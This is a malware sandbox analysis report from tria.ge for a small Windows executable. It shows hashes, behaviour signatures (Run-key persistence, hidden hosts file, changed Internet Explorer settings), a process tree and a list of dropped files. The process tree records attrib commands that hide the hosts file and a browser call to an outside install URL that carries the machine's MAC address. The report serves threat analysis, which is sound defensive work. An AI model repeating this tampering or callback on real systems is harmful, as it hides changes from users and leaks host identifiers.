Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

d664454b2f...ae.exe

windows7-x64

8

d664454b2f...ae.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    19/03/2024, 14:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d664454b2f4aafefe4e8d79b34b319ae.exe

  • Size

    45KB

  • MD5

    d664454b2f4aafefe4e8d79b34b319ae

  • SHA1

    28e9283962506986ec9d2e6d3b85738e50e02979

  • SHA256

    15f69b3b7720d59511b4b73a9a56045b5a6e8611c09181de5a157fd16542d6d5

  • SHA512

    09ef21390529088275bfad0c9a633898ba544a097d0d1e7d774d58e9efda80d8764b776e038edede777ecb6681d58e5b66166473fe836ce3b921c46f0d4f8162

  • SSDEEP

    768:tMVvp3w/SGIjuUb/0FD3SE4Y4cBRX6VX+Re5QH6DMnP6is0WMusig4s8HY:tMVvp3w/zMcFmEbREX+Rh6DM/s0fEIR

Score
8/10
evasionpersistence

Malware Config

Signatures

  • Adds policy Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Drops file in Windows directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1216
      • C:\Users\Admin\AppData\Local\Temp\d664454b2f4aafefe4e8d79b34b319ae.exe
        "C:\Users\Admin\AppData\Local\Temp\d664454b2f4aafefe4e8d79b34b319ae.exe"
        2⤵
        • Adds policy Run key to start application
        • Drops file in Drivers directory
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2360
        • C:\Windows\SysWOW64\attrib.exe
          attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
          3⤵
          • Views/modifies file attributes
          PID:2020
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
          3⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:2628
        • C:\program files\internet explorer\iexplore.exe
          "C:\program files\internet explorer\iexplore.exe" "http://www.qqdcf.com/install.asp?ver=081229&tgid=6688&address=4A-4F-10-9F-65-B0&regk=1&flag=dd1f7bedc831c3870a8349dfa3e92eeb&frandom=2241"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2632
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2632 CREDAT:275457 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1068

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      cb4cb036d7c3b38a47c2dd01d31b2859

      SHA1

      403bebdf3fac1a522c56eb568c3fcc318ea4ee6f

      SHA256

      23be331adbcd20006b85caefdbe15907c28fdad3364d8530a20340e26f70e7ca

      SHA512

      c8f2d3be0e7514556060c5293c7f044ce59f4b5ec5e5ebae9fa3d508ab8ea053c47254002f2eeef24cf3290b4f81fd5109bc9ba0fcba96d100bd033fa8462ec6

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      5ce1b26b7beca2509e3ffbdbee93a175

      SHA1

      170ee6ddd3b491d8db4f7bc2982c3c4d15c41fdb

      SHA256

      ba61d3aa4bfa8bc82c9e66cabe62732ece6145d77bfd6c786aa6e2fe5f83b354

      SHA512

      a008f13666f6b879973c7b8e8da1931afaff3b129b28e31a3d83904d30135339a72b47c511788e6bc8d2920a2ff2ae6977e859aaa72bb9a22d8cca1deff1481c

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      beea77657ca9327b65f5abbef73dd3ca

      SHA1

      ddcc8b012b98116fa07aa48c8e7c7fb55f48d074

      SHA256

      4608481f078e2bf207570305ef101c9e44703b5f5db8daf84aec8d97cb6ccee3

      SHA512

      a4c557762560c3a13d4937ec5a8ea009efda8e0a9b0827b71c6073c244f5dbb6d8f7a215d26738e909e83d4efc5c9dd082fb624f6b6d0a07f11c9dc04f1e533e

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      71759b798ec9cd8ad58537ee4929e68b

      SHA1

      ef735a7a4e0248109381c8962b2fdf1f40afa607

      SHA256

      ca465a6c8f7615f521d4bef823146a570dccb13b8f5aac7fe231b491b487a00c

      SHA512

      db35d7d1c4724a399f46c11713cd203841045e7b18b2ad6743e494e71ebbf77af70c4bc4cd2c37f31e9131f21526be46dec8416b42b29c8eab45262a87301188

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      dba1749512632a9852ecd499ed412446

      SHA1

      0542a90174232fffb0bd52ec62d5f5197df1f31c

      SHA256

      288e1f9d584b4a47cfbbb46f2a8f51567877be9339c2f27bee87b2a6a79d69e9

      SHA512

      2fa7902968331dc16decda2877470b00ea89d658ff7d8f0c551db13e2745849c384ed65afb550aa377f6ae35a8ce9cd78a3e8ccddcd52a2d091df5fca42622c6

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      cf42b8e13496350f2fda41ddceb23fe9

      SHA1

      8d94df25b9289d3dda71b31336839ac61f6757c7

      SHA256

      99f96d90d100555f5811c3a83c79f21c5f5a7c74c6d68320ca9d1de419698f78

      SHA512

      0e3efb792953c5cb39997c262d9b37e7b9793d63b5a8d8bf20a91e52316f3886b2489c2095704a260bb8ce4d4548d9f7fa9bef8d8569e5c646f9d22e063178b1

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      9f8d278b04c01441e681212c07292cf6

      SHA1

      10e635d98cf54e15f40c858a4283c8d73ea85876

      SHA256

      da7f9c93f138ce0762afa18d277a33c6b5265e584fc76638f66e3b600eeadd00

      SHA512

      443422fc82f9391b8e92a4ef0f646fdea543b5a795302ce88d7895ffc28a54e1346795490c4a510d82ba20cf2896e4c071eee93a1051ad1ac95831affd31fce7

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      ab9d4ddce2ea988c62e4db9df392901f

      SHA1

      8e9633213f31d6ee9e407f09ececc62bc9a0c1e0

      SHA256

      443f1da603ff498ee3ec8fdcd5d6787a921f509b4b3088f2f83fb4d61cbe6d2e

      SHA512

      12ea7b68859c3f5760eab8f4224e8d6112e073555cf0a57401bd155181e119d2fa567e1dc495ad47599befffde3c1561843569d7d9048c83c1fae35b45064921

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab8826.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab8941.tmp
      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar8965.tmp
      Filesize

      175KB

      MD5

      dd73cead4b93366cf3465c8cd32e2796

      SHA1

      74546226dfe9ceb8184651e920d1dbfb432b314e

      SHA256

      a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

      SHA512

      ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\~DF7FDD1C69579CB249.TMP
      Filesize

      16KB

      MD5

      477e3e04b32cc5013ee109849797ff94

      SHA1

      9335b2e1cae25eeea6f3cd4654c96d18d9c7c208

      SHA256

      28448f80adbd8defb49b029ac30845576f8e5a5623d2633fdcdd8d043234289f

      SHA512

      5912a713dd21830730247c4b9620b9e0adbe17424f79f1fb089380c583c2de11fa66512107bea1d2f635ca224e2cb0a191c3de3efae17d7091412ba37448e006

      Download Submit

    • memory/1216-443-0x0000000001DC0000-0x0000000001DC1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1216-445-0x0000000001DC0000-0x0000000001DC1000-memory.dmp

      Filesize

      4KB

      Download